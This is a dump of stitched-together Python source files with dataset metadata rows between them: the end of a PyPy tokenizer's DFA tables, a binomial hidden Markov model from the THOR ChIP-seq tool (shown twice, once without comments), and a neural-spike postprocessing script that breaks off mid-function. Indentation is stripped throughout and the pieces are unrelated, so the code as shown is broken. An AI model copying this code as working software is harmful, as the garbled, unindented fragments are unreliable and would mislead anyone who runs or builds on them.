# 11
{'/': 12, '=': 13},
# 12
{'=': 13},
# 13
{},
# 14
{'\n': 13},
# 15
{automata.DEFAULT: 30, '\n': 27,
'\r': 27, "'": 28, '\\': 29},
# 16
{automata.DEFAULT: 33, '\n': 27,
'\r': 27, '"': 31, '\\': 32},
# 17
{'\n': 13, '\r': 14},
# 18
{automata.DEFAULT: 18, '\n': 27, '\r': 27},
# 19
{'0': 34, '1': 34, '2': 34, '3': 34,
'4': 34, '5': 34, '6': 34, '7': 34,
'8': 34, '9': 34, 'A': 34, 'B': 34,
'C': 34, 'D': 34, 'E': 34, 'F': 34,
'a': 34, 'b': 34, 'c': 34, 'd': 34,
'e': 34, 'f': 34},
# 20
{'0': 35, '1': 35, '2': 35, '3': 35,
'4': 35, '5': 35, '6': 35, '7': 35},
# 21
{'.': 24, '0': 21, '1': 21, '2': 21,
'3': 21, '4': 21, '5': 21, '6': 21,
'7': 21, '8': 23, '9': 23, 'E': 25,
'J': 13, 'L': 13, 'e': 25, 'j': 13,
'l': 13},
# 22
{'0': 36, '1': 36},
# 23
{'.': 24, '0': 23, '1': 23, '2': 23,
'3': 23, '4': 23, '5': 23, '6': 23,
'7': 23, '8': 23, '9': 23, 'E': 25,
'J': 13, 'e': 25, 'j': 13},
# 24
{'0': 24, '1': 24, '2': 24, '3': 24,
'4': 24, '5': 24, '6': 24, '7': 24,
'8': 24, '9': 24, 'E': 37, 'J': 13,
'e': 37, 'j': 13},
# 25
{'+': 38, '-': 38, '0': 39, '1': 39,
'2': 39, '3': 39, '4': 39, '5': 39,
'6': 39, '7': 39, '8': 39, '9': 39},
# 26
{'0': 26, '1': 26, '2': 26, '3': 26,
'4': 26, '5': 26, '6': 26, '7': 26,
'8': 26, '9': 26, 'E': 37, 'J': 13,
'e': 37, 'j': 13},
# 27
{},
# 28
{"'": 13},
{automata.DEFAULT: 40, '\n': 13, '\r': 14},
{automata.DEFAULT: 30, '\n': 27,
'\r': 27, "'": 13, '\\': 29},
# 31
{'"': 13},
# 32
{automata.DEFAULT: 41, '\n': 13, '\r': 14},
# 33
{automata.DEFAULT: 33, '\n': 27,
'\r': 27, '"': 13, '\\': 32},
# 34
{'0': 34, '1': 34, '2': 34, '3': 34,
'4': 34, '5': 34, '6': 34, '7': 34,
'8': 34, '9': 34, 'A': 34, 'B': 34,
'C': 34, 'D': 34, 'E': 34, 'F': 34,
'L': 13, 'a': 34, 'b': 34, 'c': 34,
'd': 34, 'e': 34, 'f': 34, 'l': 13},
# 35
{'0': 35, '1': 35, '2': 35, '3': 35,
'4': 35, '5': 35, '6': 35, '7': 35,
'L': 13, 'l': 13},
# 36
{'0': 36, '1': 36, 'L': 13, 'l': 13},
# 37
{'+': 42, '-': 42, '0': 43, '1': 43,
'2': 43, '3': 43, '4': 43, '5': 43,
'6': 43, '7': 43, '8': 43, '9': 43},
# 38
{'0': 39, '1': 39, '2': 39, '3': 39,
'4': 39, '5': 39, '6': 39, '7': 39,
'8': 39, '9': 39},
# 39
{'0': 39, '1': 39, '2': 39, '3': 39,
'4': 39, '5': 39, '6': 39, '7': 39,
'8': 39, '9': 39, 'J': 13, 'j': 13},
# 40
{automata.DEFAULT: 40, '\n': 27,
'\r': 27, "'": 13, '\\': 29},
{automata.DEFAULT: 41, '\n': 27,
'\r': 27, '"': 13, '\\': 32},
# 42
{'0': 43, '1': 43, '2': 43, '3': 43,
'4': 43, '5': 43, '6': 43, '7': 43,
'8': 43, '9': 43},
# 43
{'0': 43, '1': 43, '2': 43, '3': 43,
'4': 43, '5': 43, '6': 43, '7': 43,
'8': 43, '9': 43, 'J': 13, 'j': 13},
]
pseudoDFA = automata.DFA(states, accepts)
accepts = [False, False, False, False, False, True]
states = [
# 0
{automata.DEFAULT: 0, '"': 1, '\\': 2},
{automata.DEFAULT: 4, '"': 3, '\\': 2},
# 2
{automata.DEFAULT: 4},
# 3
{automata.DEFAULT: 4, '"': 5, '\\': 2},
{automata.DEFAULT: 4, '"': 1, '\\': 2},
# 5
{automata.DEFAULT: 4, '"': 5, '\\': 2},
]
double3DFA = automata.NonGreedyDFA(states, accepts)
accepts = [False, False, False, False, False, True]
states = [
{automata.DEFAULT: 0, "'": 1, '\\': 2},
# 1
{automata.DEFAULT: 4, "'": 3, '\\': 2},
{automata.DEFAULT: 4},
{automata.DEFAULT: 4, "'": 5, '\\': 2},
# 4
{automata.DEFAULT: 4, "'": 1, '\\': 2},
{automata.DEFAULT: 4, "'": 5, '\\': 2},
]
single3DFA = automata.NonGreedyDFA(states, accepts)
accepts = [False, True, False, False]
states = [
# 0
{automata.DEFAULT: 0, "'": 1, '\\': 2},
{},
{automata.DEFAULT: 3},
{automata.DEFAULT: 3, "'": 1, '\\': 2},
]
singleDFA = automata.DFA(states, accepts)
accepts = [False, True, False, False]
states = [
# 0
{automata.DEFAULT: 0, '"': 1, '\\': 2},
# 1
{},
# 2
{automata.DEFAULT: 3},
# 3
{automata.DEFAULT: 3, '"': 1, '\\': 2},
]
doubleDFA = automata.DFA(states, accepts)
#_______________________________________________________________________
# End of automatically generated DFA's
endDFAs = {"'" : singleDFA,
'"' : doubleDFA,
'r' : None,
'R' : None,
'u' : None,
'U' : None,
'b' : None,
'B' : None}
for uniPrefix in ("", "u", "U", "b", "B"):
for rawPrefix in ("", "r", "R"):
prefix = uniPrefix + rawPrefix
endDFAs[prefix + "'''"] = single3DFA
endDFAs[prefix + '"""'] = double3DFA
whiteSpaceStatesAccepts = [True]
whiteSpaceStates = [{'\t': 0, ' ': 0, '\x0c': 0}]
whiteSpaceDFA = automata.DFA(whiteSpaceStates, whiteSpaceStatesAccepts)
# ______________________________________________________________________
# COPIED:
triple_quoted = {}
for t in ("'''", '"""',
"r'''", 'r"""', "R'''", 'R"""',
"u'''", 'u"""', "U'''", 'U"""',
"b'''", 'b"""', "B'''", 'B"""',
"ur'''", 'ur"""', "Ur'''", 'Ur"""',
"uR'''", 'uR"""', "UR'''", 'UR"""',
"br'''", 'br"""', "Br'''", 'Br"""',
"bR'''", 'bR"""', "BR'''", 'BR"""'):
triple_quoted[t] = t
single_quoted = {}
for t in ("'", '"',
"r'", 'r"', "R'", 'R"',
"u'", 'u"', "U'", 'U"',
"b'", 'b"', "B'", 'B"',
"ur'", 'ur"', "Ur'", 'Ur"',
"uR'", 'uR"', "UR'", 'UR"',
"br'", 'br"', "Br'", 'Br"',
"bR'", 'bR"', "BR'", 'BR"'):
single_quoted[t] = t
tabsize = 8
# PYPY MODIFICATION: removed StopTokenizing class as it's not needed here
# PYPY MODIFICATION: removed tokenize() as it's not needed here
# PYPY MODIFICATION: removed generate_tokens() as it was copied / modified
# in pythonlexer.py
# PYPY MODIFICATION: removed main() as it's not needed here
| true | true |
1c3336890a8d0e233dbb651635e44b8a59ac72c8 | 7,181 | py | Python | src/rgt/THOR/binom_hmm.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | src/rgt/THOR/binom_hmm.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | src/rgt/THOR/binom_hmm.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
THOR detects differential peaks in multiple ChIP-seq profiles associated
with two distinct biological conditions.
Copyright (C) 2014-2016 Manuel Allhoff (allhoff@aices.rwth-aachen.de)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
@author: Manuel Allhoff
"""
from __future__ import print_function
import sys
import string
import numpy as np
from scipy.stats import binom
from hmmlearn.hmm import _BaseHMM
from help_hmm import _valid_posteriors
def get_init_parameters(s1, s2, **info):
n_ = np.array([info['count'], info['count']])
#get observation that occurs most often:
m_ =[float(np.argmax(np.bincount(map(lambda x: x[0], s1)))), float(np.argmax(np.bincount(map(lambda x: x[1], s2)))) ]
p_ = [[-1,-1,-1],[-1,-1,-1]] #first: 1. or 2. emission, second: state
p_[0][0] = 1. / n_[0]
p_[1][0] = 1. / n_[1]
p_[0][1] = m_[0] / n_[0]
p_[1][1] = p_[1][0]
p_[0][2] = p_[0][0]
p_[1][2] = m_[1] / n_[1]
return np.asarray(n_), np.asarray(p_)
class BinomialHMM(_BaseHMM):
def __init__(self, n, p, dim_cond_1, dim_cond_2, init_state_seq=None, n_components=2, covariance_type='diag', startprob_prior=None, transmat_prior=None,
algorithm="viterbi", means_prior=None, means_weight=0,
covars_prior=1e-2, covars_weight=1,
random_state=None, n_iter=10, thresh=1e-2,
params=string.ascii_letters,
init_params=string.ascii_letters):
_BaseHMM.__init__(self, n_components,
startprob_prior=startprob_prior,
transmat_prior=transmat_prior, algorithm=algorithm,
random_state=random_state, n_iter=n_iter,
tol=thresh, params=params,
init_params=init_params)
self.dim = [dim_cond_1, dim_cond_2] #dimension of one emission
self.n = n
self.p = p
self.n_features = 2 #emission dimension
self.init_state_seq = init_state_seq
self.count_s1, self.count_s2 = 0, 0
self.lookup_logpmf = {}
def _compute_log_likelihood(self, X):
res = []
for x in X: #over all observations
row = []
for i in range(self.n_components): #over number of HMM's state
r_sum = 0
for j in range(self.n_features): #over dim
it = range(self.dim[0]) if j == 0 else range(self.dim[0], self.dim[0] + self.dim[1]) #grab proper observation
for k in it:
index = (int(x[k]), self.p[j][i], self.n[j])
if not self.lookup_logpmf.has_key( index ):
self.lookup_logpmf[index] = binom.logpmf(x[k], self.n[j], self.p[j][i])
r_sum += self.lookup_logpmf[index]
row.append(r_sum)
res.append(row)
return np.asarray(res)
def _generate_sample_from_state(self, state, random_state=None):
output = []
for i, d in enumerate(self.dim):
for _ in range(d):
output.append( binom.rvs(self.n[i], self.p[i][state]) )
return np.asarray(output)
def _initialize_sufficient_statistics(self):
stats = super(BinomialHMM, self)._initialize_sufficient_statistics()
stats['post'] = np.zeros([self.n_components])
stats['post_emission'] = np.zeros([self.n_features, self.n_components])
return stats
def _help_accumulate_sufficient_statistics(self, obs, stats, posteriors):
for t, symbol in enumerate(obs):
pot_it = [range(self.dim[0]), range(self.dim[0], self.dim[0] + self.dim[1])] #consider both classes
for j, it in enumerate(pot_it):
for i in it:
stats['post'] += posteriors[t]
stats['post_emission'][j] += posteriors[t] * symbol[i]
stats['posterior'] = np.copy(posteriors)
def _accumulate_sufficient_statistics(self, stats, obs, framelogprob,
posteriors, fwdlattice, bwdlattice
):
super(BinomialHMM, self)._accumulate_sufficient_statistics(
stats, obs, framelogprob, posteriors, fwdlattice, bwdlattice
)
posteriors = _valid_posteriors(posteriors, obs, self.dim)
self._help_accumulate_sufficient_statistics(obs, stats, posteriors)
def _add_pseudo_counts(arr):
if type(arr) is np.ndarray:
tmp = np.array([1e-323 if x < 1e-323 else x for x in arr], np.float64)
# tmp2 = np.array([1.0 - 1.0e-5 if x == 1.0 else x for x in tmp], np.float64)
return tmp
else:
tmp = 1e-323 if arr < 1e-323 else arr
# tmp2 = 1.0 - 1.0e-10 if tmp == 1.0 else tmp
return tmp
def _help_do_mstep(self, stats):
for i in range(self.n_features):
self.p[i] = stats['post_emission'][i] / (self.n[i] * self._add_pseudo_counts(stats['post']))
print('help_m_step', i, stats['post_emission'][i], stats['post'], self.p[i], file=sys.stderr)
def _do_mstep(self, stats):
super(BinomialHMM, self)._do_mstep(stats)
self._help_do_mstep(stats)
self.p[0,0] = self.p[1,0]
self.p[0,1] = self.p[1,2]
self.p[1,1] = self.p[0,2]
if __name__ == '__main__':
p_ = np.array([[0.01, 0.8, 0.1], [0.01, 0.1, 0.8]])
n_ = np.array([100, 100])
m = BinomialHMM(n_components=3, p = p_, startprob=[1,0,0], n = n_, dim_cond_1=2, dim_cond_2=4)
X, Z = m.sample(100) #returns (obs, hidden_states)
p_ = np.array([[0.1, 0.7, 0.3], [0.1, 0.2, 0.9]])
n_ = np.array([100, 100])
m2 = BinomialHMM(n_components=3, n=n_, p=p_, dim_cond_1=2, dim_cond_2=4)
#cProfile.run("m2.fit([X])")
m2.fit([X])
e = m2.predict(X)
print(m2.p)
for i, el in enumerate(X):
print(el, Z[i], e[i], Z[i] == e[i], sep='\t')
# logprob, posteriors = m2.eval(X)
# print('logprob:', logprob)
# print('posteriors:', posteriors)
# print('estim. states ', m2.predict(X))
# print(m2.predict_proba(X))
# print(m2.n)
# print(m2.p)
# print(m2._get_transmat())
# init_state = m2.predict(X)
# m3 = BinomialHMM2d3s(n_components=3, n=n_)
# m3.fit([X], init_params='advanced')
# print(m3._get_transmat())
# print(m3.p)
# m2.eval(X)
| 39.027174 | 156 | 0.58613 |
from __future__ import print_function
import sys
import string
import numpy as np
from scipy.stats import binom
from hmmlearn.hmm import _BaseHMM
from help_hmm import _valid_posteriors
def get_init_parameters(s1, s2, **info):
n_ = np.array([info['count'], info['count']])
m_ =[float(np.argmax(np.bincount(map(lambda x: x[0], s1)))), float(np.argmax(np.bincount(map(lambda x: x[1], s2)))) ]
p_ = [[-1,-1,-1],[-1,-1,-1]]
p_[0][0] = 1. / n_[0]
p_[1][0] = 1. / n_[1]
p_[0][1] = m_[0] / n_[0]
p_[1][1] = p_[1][0]
p_[0][2] = p_[0][0]
p_[1][2] = m_[1] / n_[1]
return np.asarray(n_), np.asarray(p_)
class BinomialHMM(_BaseHMM):
def __init__(self, n, p, dim_cond_1, dim_cond_2, init_state_seq=None, n_components=2, covariance_type='diag', startprob_prior=None, transmat_prior=None,
algorithm="viterbi", means_prior=None, means_weight=0,
covars_prior=1e-2, covars_weight=1,
random_state=None, n_iter=10, thresh=1e-2,
params=string.ascii_letters,
init_params=string.ascii_letters):
_BaseHMM.__init__(self, n_components,
startprob_prior=startprob_prior,
transmat_prior=transmat_prior, algorithm=algorithm,
random_state=random_state, n_iter=n_iter,
tol=thresh, params=params,
init_params=init_params)
self.dim = [dim_cond_1, dim_cond_2]
self.n = n
self.p = p
self.n_features = 2
self.init_state_seq = init_state_seq
self.count_s1, self.count_s2 = 0, 0
self.lookup_logpmf = {}
def _compute_log_likelihood(self, X):
res = []
for x in X:
row = []
for i in range(self.n_components):
r_sum = 0
for j in range(self.n_features): #over dim
it = range(self.dim[0]) if j == 0 else range(self.dim[0], self.dim[0] + self.dim[1]) #grab proper observation
for k in it:
index = (int(x[k]), self.p[j][i], self.n[j])
if not self.lookup_logpmf.has_key( index ):
self.lookup_logpmf[index] = binom.logpmf(x[k], self.n[j], self.p[j][i])
r_sum += self.lookup_logpmf[index]
row.append(r_sum)
res.append(row)
return np.asarray(res)
def _generate_sample_from_state(self, state, random_state=None):
output = []
for i, d in enumerate(self.dim):
for _ in range(d):
output.append( binom.rvs(self.n[i], self.p[i][state]) )
return np.asarray(output)
def _initialize_sufficient_statistics(self):
stats = super(BinomialHMM, self)._initialize_sufficient_statistics()
stats['post'] = np.zeros([self.n_components])
stats['post_emission'] = np.zeros([self.n_features, self.n_components])
return stats
def _help_accumulate_sufficient_statistics(self, obs, stats, posteriors):
for t, symbol in enumerate(obs):
pot_it = [range(self.dim[0]), range(self.dim[0], self.dim[0] + self.dim[1])] #consider both classes
for j, it in enumerate(pot_it):
for i in it:
stats['post'] += posteriors[t]
stats['post_emission'][j] += posteriors[t] * symbol[i]
stats['posterior'] = np.copy(posteriors)
def _accumulate_sufficient_statistics(self, stats, obs, framelogprob,
posteriors, fwdlattice, bwdlattice
):
super(BinomialHMM, self)._accumulate_sufficient_statistics(
stats, obs, framelogprob, posteriors, fwdlattice, bwdlattice
)
posteriors = _valid_posteriors(posteriors, obs, self.dim)
self._help_accumulate_sufficient_statistics(obs, stats, posteriors)
def _add_pseudo_counts(arr):
if type(arr) is np.ndarray:
tmp = np.array([1e-323 if x < 1e-323 else x for x in arr], np.float64)
# tmp2 = np.array([1.0 - 1.0e-5 if x == 1.0 else x for x in tmp], np.float64)
return tmp
else:
tmp = 1e-323 if arr < 1e-323 else arr
# tmp2 = 1.0 - 1.0e-10 if tmp == 1.0 else tmp
return tmp
def _help_do_mstep(self, stats):
for i in range(self.n_features):
self.p[i] = stats['post_emission'][i] / (self.n[i] * self._add_pseudo_counts(stats['post']))
print('help_m_step', i, stats['post_emission'][i], stats['post'], self.p[i], file=sys.stderr)
def _do_mstep(self, stats):
super(BinomialHMM, self)._do_mstep(stats)
self._help_do_mstep(stats)
self.p[0,0] = self.p[1,0]
self.p[0,1] = self.p[1,2]
self.p[1,1] = self.p[0,2]
if __name__ == '__main__':
p_ = np.array([[0.01, 0.8, 0.1], [0.01, 0.1, 0.8]])
n_ = np.array([100, 100])
m = BinomialHMM(n_components=3, p = p_, startprob=[1,0,0], n = n_, dim_cond_1=2, dim_cond_2=4)
X, Z = m.sample(100) #returns (obs, hidden_states)
p_ = np.array([[0.1, 0.7, 0.3], [0.1, 0.2, 0.9]])
n_ = np.array([100, 100])
m2 = BinomialHMM(n_components=3, n=n_, p=p_, dim_cond_1=2, dim_cond_2=4)
#cProfile.run("m2.fit([X])")
m2.fit([X])
e = m2.predict(X)
print(m2.p)
for i, el in enumerate(X):
print(el, Z[i], e[i], Z[i] == e[i], sep='\t')
# logprob, posteriors = m2.eval(X)
# print('logprob:', logprob)
# print('posteriors:', posteriors)
# print('estim. states ', m2.predict(X))
# print(m2.predict_proba(X))
# print(m2.n)
# print(m2.p)
# print(m2._get_transmat())
# init_state = m2.predict(X)
# m3 = BinomialHMM2d3s(n_components=3, n=n_)
# m3.fit([X], init_params='advanced')
# print(m3._get_transmat())
# print(m3.p)
# m2.eval(X)
| true | true |
1c3337b4228671c7b2f5d125c8ec33d2f9fa971e | 26,053 | py | Python | postprocessing_preBotBot/doPost.py | JoshMend/prebotc-graph-model | 4002e51ab965be366b30c2a6d900ac288fa41245 | [
"BSD-3-Clause"
] | null | null | null | postprocessing_preBotBot/doPost.py | JoshMend/prebotc-graph-model | 4002e51ab965be366b30c2a6d900ac288fa41245 | [
"BSD-3-Clause"
] | null | null | null | postprocessing_preBotBot/doPost.py | JoshMend/prebotc-graph-model | 4002e51ab965be366b30c2a6d900ac288fa41245 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
'''
This file does all the post processing for a given mat file at once. This includes:
1) Deleting Transient
2)Binning the spikes
3)Filter spikes using gaussian distribution
4)Using butterworth filter to remove high frequency signals to smooth
5)Finds Phase Lag and Population Correlation
'''
import sys
import numpy as np
import scipy.signal
import scipy.io
import argparse
import networkx as nx
import matplotlib.pyplot as plt
import cmath
import math
maxorder=20
eta_norm_pts = 10
def parse_args(argv):
# defaults
transient = 10000 # ms
spike_thresh = -20 # mV
f_sigma = 20 # ms
butter_high = 4 # Hz
butter_low = -np.inf # Hz
bin_width = 20 # ms
cutoff = 0.5
peak_order = 30
peak_percentile = 75
eta_norm_pts=8
op_abs_thresh=0.2
# parsing
parser = argparse.ArgumentParser(prog="doPost",
description=('Postprocessing of'
' model output'))
parser.add_argument('sim', help='model output (.mat) file')
parser.add_argument('output', help='output (.jpg) filename')
parser.add_argument('--transient', '-t',
help='transient time, ms (default: %(default)s)',
type=float, default=transient)
parser.add_argument('--sec', '-s', action='store_true',
help='time units are in seconds (default: ms)')
parser.add_argument('--volt', '-V', action='store_true',
help=('file contains voltage traces '
'(default: sparse spike trains)'))
parser.add_argument('--thresh',
help='spike threshold, mV (default: %(default)s)',
type=float, default=spike_thresh)
parser.add_argument('--fsig', '-f',
help=('filter standard deviation, ms '
'(default: %(default)s)'),
type=float, default=f_sigma)
parser.add_argument('--butter_high',
help=('Butterworth filter upper cutoff frequency, Hz '
'(default: %(default)s)'),
type=float, default=butter_high)
parser.add_argument('--butter_low',
help=('Butterworth filter lower cutoff frequency, Hz '
'(default: %(default)s)'),
type=float, default=butter_low)
parser.add_argument('--bin_width', '-b',
help='bin width, ms (default: %(default)s)',
type=float, default=bin_width)
parser.add_argument('--cut', '-c',
help='burst cutoff parameter (default: %(default)s)',
type=float, default=cutoff)
args = parser.parse_args(argv[1:])
return args.sim, args.output, args.transient, args.sec, args.thresh, \
args.fsig, args.butter_low, args.butter_high, args.bin_width,\
args.cut, args.volt,peak_order,peak_percentile,eta_norm_pts,op_abs_thresh,
'''
This method chops of the transient stage of the data for better processing
parameters: data-Data being passed in to chop
transient- time and which you want to chop till
dt-the change in time of the model
return: The modified data excluding transient stage
'''
def chop_transient(data, transient, dt):
firstIdx = int(np.ceil(transient / dt) - 1)
return data[:,firstIdx:]
'''
Find spikes in voltage data by taking relative maxima
parameters: data- self-explanatory
threshhold- The voltage at which you start to count data as a spike
return: new_indices-location of the maxima
spike_mat-dense matrix containing 1 or 0 based on if a spike is present
'''
def find_spikes(data, threshold):
indices = scipy.signal.argrelmax(data, axis=1) # 1st and 2nd coords of maxima
mask = np.where(data[indices] > threshold)
new_indices = (indices[0][mask],
indices[1][mask])
spike_mat = np.zeros(np.shape(data), dtype=np.int) # dense format
spike_mat[new_indices] = 1
return new_indices, spike_mat
'''
Return time indices of spiking of a given neuron
'''
def spikes_of_neuron(spikes, neuron):
return spikes[1][np.where(spikes[0] == neuron)]
'''
Filter the spike timeseries. Returns both neuron-by-neuron timeseries
filtered with a gaussian kernel and the population data filtered
with a butterworth filter.
Parameters
==========
spike_mat: the numneuron x time matrix of spikes
samp_freq: sample frequency
f_sigma: variance of gaussian
butter_freq: butterworth filter cutoff frequency(s)
Returns
=======
spike_fil: gaussian filtered matrix, same shape as spike_mat
int_signal: butterworth filtered population timeseries
spike_fil_butter: butterworth filtered matrix, same shape as spike_mat
'''
def spikes_filt(spike_mat, samp_freq, f_sigma, butter_freq):
'''
Filter the spike timeseries. Returns both neuron-by-neuron timeseries
filtered with a gaussian kernel and the population data filtered
with a butterworth filter.
Parameters
==========
spike_mat: the numneuron x time matrix of spikes
samp_freq: period (in ms) between measurements in spike_mat
f_sigma: variance of gaussian
butter_freq: butterworth filter cutoff frequency(s)
Returns
=======
spike_fil: gaussian filtered matrix, same shape as spike_mat
int_signal: butterworth filtered population timeseries
spike_fil_butter: butterworth filtered matrix, same shape as spike_mat
'''
def filt_window_gauss(samp_freq, std = 20, width = None, normalize = 1):
if width is None:
width = std*4+1
width /= samp_freq
std /= samp_freq
w = scipy.signal.gaussian(width, std)
if not normalize == 0:
w = normalize * w / sum(w)
return w
def filt_gauss(spike_mat, samp_freq, f_sigma=20):
w = filt_window_gauss(samp_freq, std=f_sigma, normalize=1)
spike_fil = scipy.signal.fftconvolve(spike_mat, w[ np.newaxis, : ],
mode='same')
#spike_fil = scipy.signal.convolve(spike_mat, w[ np.newaxis, : ],
# mode='same')
return spike_fil
def filt_butter(data, samp_freq, butter_freq, axis=-1):
'''
Filter data with a 2nd order butterworth filter.
Parameters
==========
data: ndarray
samp_freq: sampling period (s)
butter_freq: [cutoff_low, cutoff_high] (Hz), can be infinite
axis (optional): axis along which to filter, default = -1
Returns
=======
filtNs: filtered version of data
'''
order = 2
ny = 0.5 / samp_freq # Nyquist frequency
cof = butter_freq / ny # normalized cutoff freq
if np.isneginf(cof[0]) and np.isfinite(cof[1]):
# lowpass
cof1 = cof[1]
b, a = scipy.signal.butter(order, cof1, btype='low')
filtNs = scipy.signal.filtfilt(b, a, data, axis=axis)
elif np.isfinite(cof[0]) and np.isinf(cof[1]):
# highpass
cof1 = cof[0]
b, a = scipy.signal.butter(order, cof1, btype='high')
filtNs = scipy.signal.filtfilt(b, a, data, axis=axis)
elif np.isfinite(cof[0]) and np.isfinite(cof[1]):
# bandpass
b, a = scipy.signal.butter(order, cof, btype='band')
filtNs = scipy.signal.filtfilt(b, a, data, axis=axis)
else:
raise Exception('filt_butter called with bad cutoff frequency')
filtNs /= samp_freq # normalize to rate
return filtNs
spike_fil = filt_gauss(spike_mat, samp_freq, f_sigma=f_sigma)
int_signal = filt_butter(np.mean(spike_mat, axis=0),
samp_freq*1e-3, butter_freq)
spike_fil_butter = filt_butter(spike_fil, samp_freq*1e-3,
butter_freq, axis=1)
return spike_fil, int_signal, spike_fil_butter
'''
Bin spikes
Parameters
==========
spike_mat: matrix of spikes, (num_neuron x num_time)
bin_width: bin width in time units
dt: sampling frequency in spike mat
Returns
=======
bins: an array of the bin locations in time units
binned_spikes: a new matrix (num_neuron x num_bins)
'''
def bin_spikes(spike_mat, bin_width, dt):
num_neurons= np.shape(spike_mat)[0]
num_times = np.shape(spike_mat)[1]
stride = int(np.ceil(bin_width / dt))
bins = np.arange(0, num_times, stride, dtype=np.float)
which_bins = np.digitize(range(0, num_times), bins)
num_bins = len(bins)
binned_spikes = np.zeros((num_neurons, num_bins), dtype=np.int)
for i in range(num_bins):
bin_mask = np.where(which_bins == i)[0] # mask data in bin i, tuple
bin_data = spike_mat[:,bin_mask]
binned_spikes[:,i] = np.sum(bin_data, axis=1).flatten()
return bins, binned_spikes
'''
This is computes the cross correlation for two signals
paramters:
signal_1: first signal you want to use
signal_2: second signal you want to use
taolen: this number determines how much of the tao to use
returns:
values of the cross correlation
'''
def xcorr(signal_1,signal_2):
signal_1 = np.asarray(signal_1)
signal_2 = np.asarray(signal_2)
#Centering the data, giving it a zero mean to reduce variance and not worry about peak differences
m1 = np.mean(signal_1)
m2 = np.mean(signal_2)
signal_1_centered = (signal_1 - m1) / (np.std(signal_1) * len(signal_1))
signal_2_centered = (signal_2 - m2) / np.std(signal_2)
xcorr = scipy.signal.correlate(signal_1_centered,signal_2_centered)
return xcorr
'''
Gets info from the graph to be used for plotting
'''
def get_graphinfo(graph_fn):
graph = nx.read_gml(graph_fn)
cells_inhib = np.array(nx.get_node_attributes(graph, 'inh').values(),
dtype=np.int)
graph_edges = nx.edges(graph)
number_of_nodes = nx.number_of_nodes(graph)
degree_histogram = nx.degree_histogram(graph)
return cells_inhib, graph_edges,number_of_nodes,degree_histogram
'''
This method gets the time at which the peak occurs for a signal
goes through the given peak_times and finds at which point the signal is the
strongest
peak_times: the times at which a peak in the signal occurs
signal: The signal that you want to find the max of
'''
def find_max_time(peak_times,signal):
max_time = np.nan
for t in peak_times:
if np.isnan(max_time):
max_time = t
elif signal[t] > signal[max_time]:
max_time = t
return max_time
'''
This method finds the phase lag and population correlation for the data given. Use the max peak from the autocorrelation and then the cross correlation peak in the middle of those two
input:
xcorr-The cross correlation signal
autocorr-An autocorrelations signal to be ran against
output:
phase-The phase lag/difference between two populations
pop_corr-The correlation between both signals
'''
def find_metrics(xcorr,autocorr):
max_time_cross = np.nan;
peak_auto = scipy.signal.argrelmax(autocorr)[0].tolist()
peak_cross = scipy.signal.argrelmax(xcorr)[0].tolist()
max_time = find_max_time(peak_auto,autocorr)
for i in range(peak_auto.index(max_time)+1,len(peak_auto)):
if autocorr[peak_auto[i]] > 0:
max_time_next = peak_auto[i]
break
for x in peak_cross:
if x > max_time and x < max_time_next and xcorr[x] > 0:
max_time_cross = x
break
auto_period = max_time_next - max_time
auto_cross_perioid = max_time_cross - max_time
phase = float(auto_cross_perioid)/float(auto_period)
return phase, xcorr[max_time_cross]
'''
This method finds the population burst peaks for a given signal, uses a percentile filter to elimnate finding noisy peaks
input:
signal-This is the signal you want to find the peaks of
peak_order-The number of points of comparison for each peak on each side of the current value
peak_percentile-The percentage threshold the peak must meet
dt-The time step
output:
pop_burst_peak-Peaks of the signal that pass the given criteria for a peak
'''
def burst_stats(signal,peak_order,peak_percentile,dt):
pop_burst_peak=scipy.signal.argrelmax(signal, order=peak_order)[0]
pop_burst_peak=pop_burst_peak[signal[pop_burst_peak] >
np.percentile(signal,peak_percentile)]
return pop_burst_peak
'''
This method is used to get the phi (phase differences) between signals,
here we use a moving window to find the refrence perioid to calculate phi
input:
pop_burst_peak1(2)-This is the time for the peaks from signal 1 or signal 2
bins-This is the bin info for the signals after some post processing
output:
phis-List of phis for the signals
'''
def get_phis(pop_burst_peak1,pop_burst_peak2,bins):
phis = []
windowStartIndex = 0
windowEndIndex = 1
while windowEndIndex < len(pop_burst_peak1):
windowStart = pop_burst_peak1[windowStartIndex]
windowEnd = pop_burst_peak1[windowEndIndex]
peaksInWindow = [i for i in pop_burst_peak2 if i >= windowStart and i <= windowEnd]
for peak in peaksInWindow:
phi = (bins[peak] - bins[windowStart]) / (bins[windowEnd] - bins[windowStart])
phis.append(phi)
windowStartIndex = windowEndIndex
windowEndIndex = windowEndIndex + 1
return phis
'''
Map phi values to a circle to accuratley take mean and std of the values
input:
phis- Phi values that are in [0,1]
output:
phis- Phi values that are now mapped to [0,2pi] represents radians
'''
def map_phi_to_complex(phis):
complex = []
for i in range(len(phis)):
radians = 2*np.pi*phis[i]
complex.append(cmath.rect(1,radians))
return complex
'''
This will get the mean phi and variance using circular statistics
input:
complex_values- This is a list of complex values that are gotten from the phi values
output:
mean_angle- This is the mean angle of the phi values, represents what the average phase is (can be converted back)
variance_circular- This is the variance of the angles, 0 represents all phi values are the same.
'''
def get_circular_statistics(complex_values):
mean_resultant = np.mean(complex_values)
mean_angle = cmath.phase(mean_resultant)
variance_circular = abs(mean_resultant)
return mean_angle,variance_circular
'''
This converts the mean angle back to the standard phi values which lies in [0,1]
input:
mean_angle- This is the mean angle that was calculated from the list of phis
output:
This is the converted average phi values that now consisted with other metrics
'''
def get_normalized_phi(mean_angle):
if mean_angle < 0:
return (2*math.pi + mean_angle) / (2*math.pi)
else:
return mean_angle / (2*math.pi)
def synchrony_stats(data, dt, maxlags=3000):
'''
Synchrony measures
Parameters
==========
data: numneuron x time
dt: time spacing
maxlags: maximal lag for autocorrelation, default=3000 ms
Returns
